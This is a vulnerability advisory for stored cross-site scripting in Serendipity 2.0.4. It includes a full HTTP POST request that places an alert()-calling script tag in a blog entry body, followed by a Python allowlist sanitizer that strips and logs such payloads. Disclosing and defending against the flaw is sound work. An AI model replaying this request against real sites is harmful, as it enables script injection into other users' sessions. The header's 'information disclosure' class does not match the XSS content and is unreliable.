========================================
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
Application: Serendipity
Class: Sensitive Information disclosure
Versions Affected: <= latest version
Vendor URL: http://docs.s9y.org/
Software URL: http://docs.s9y.org/downloads.html
Bugs: Persistent Cross Site Scripting
Date found: 29.10.2016
Author: Besim
========================================
2. CREDIT
========================================
These vulnerabilities were identified by Meryem AKDOĞAN and Besim ALTINOK

3. VERSIONS AFFECTED
========================================
<= latest version

4. TECHNICAL DETAILS & POC
========================================
Stored Cross Site Scripting (No Admin Required)
========================================
1) Editor login panel
2) User clicks 'New Entry'
3) Attacker (normal user) enters the XSS payload in the 'Entry Body' input
4) Vulnerable parameter and payload: &body=<Script>alert('Meryem ExploitDB')</Script>

### HTTP Request ###
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Cookie: ---
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762

- POST DATA
serendipity[action]=admin
&serendipity[adminModule]=entries
&serendipity[adminAction]=save
&serendipity[id]=
&serendipity[timestamp]=1477314176
&serendipity[preview]=false
&serendipity[token]=324fa32a404e03de978d9a18f86a3338
&serendipity[title]=New Page
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
&serendipity[extended]=
&serendipity[chk_timestamp]=1477314176
&serendipity[new_timestamp]=2016-10-24 15:02
&serendipity[isdraft]=false
&serendipity[allow_comments]=true
&serendipity[had_categories]=1
&serendipity[propertyform]=true
&serendipity[properties][access]=public
&ignore_password=
&serendipity[properties][entrypassword]=
&serendipity[change_author]=4
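The root cause described above is that the entry body submitted by a low-privileged editor is stored and later rendered to other users without an HTML allowlist being applied. The following is an added example, not Serendipity's own code and not the fix the project shipped: it parses a POST body constructed from the POST DATA shown in the advisory, extracts the serendipity[body] field, and runs it through a small allowlist sanitizer built on Python's standard library. A blog editor legitimately needs some HTML (paragraphs, links, emphasis), so the sanitizer keeps an explicit set of tags and attributes and drops everything else, including script/style elements with their contents, event-handler attributes and non-http(s) link targets. The list of dropped items doubles as a detection signal worth logging. Tag and attribute names, the allowlist contents and the field name extraction are assumptions chosen for illustration.

```python
"""Allowlist HTML sanitizer for a stored CMS entry body (added example, not Serendipity code)."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed from the POST DATA in the advisory above; only the fields needed here.
CAPTURED_POST_BODY = (
    "serendipity[action]=admin"
    "&serendipity[adminModule]=entries"
    "&serendipity[adminAction]=save"
    "&serendipity[title]=New Page"
    "&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>"
    "&serendipity[extended]="
    "&serendipity[isdraft]=false"
)

# Assumed allowlist for an editor's entry body: everything not listed is removed.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "code", "pre", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # event handlers (on*) and style are never allowed
DROP_WITH_CONTENT = {"script", "style"}    # tag and its inner text are both removed
VOID_TAGS = {"br"}


def _safe_href(value):
    """Accept http(s)/mailto links and same-origin paths; reject javascript:, data:, //host."""
    v = value.strip().lower()
    if v.startswith(("http://", "https://", "mailto:")):
        return True
    return v.startswith("/") and not v.startswith("//")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from allowed tags only. HTMLParser lowercases tag
    names, so the mixed-case <Script> from the advisory is matched as well."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized output fragments
        self.dropped = []      # what was removed, for logging / detection
        self.skip_depth = 0    # > 0 while inside a script/style element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # unknown tag removed, its text content is kept
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href" and not _safe_href(value):
                self.dropped.append(f"{tag}@{name}={value}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))  # re-encode text as text


def extract_entry_body(post_body):
    """Pull the serendipity[body] field out of a form-encoded request body."""
    fields = parse_qs(post_body, keep_blank_values=True)
    return fields.get("serendipity[body]", [""])[0]


def sanitize_entry_body(raw_html):
    """Return (sanitized_html, list_of_dropped_items)."""
    parser = AllowlistSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    body = extract_entry_body(CAPTURED_POST_BODY)
    clean, dropped = sanitize_entry_body(body)
    print("stored body :", body)
    print("sanitized   :", repr(clean))
    print("dropped     :", dropped)   # non-empty list is worth an audit-log entry
```

Run as a script it shows the advisory's payload reduced to an empty string with `['script']` in the dropped list; benign markup such as a paragraph with an https link passes through, while an `onclick` attribute or a `javascript:` href on that link is stripped and recorded. The same parser can be run over already-stored entries to find bodies that were saved before sanitization was enforced.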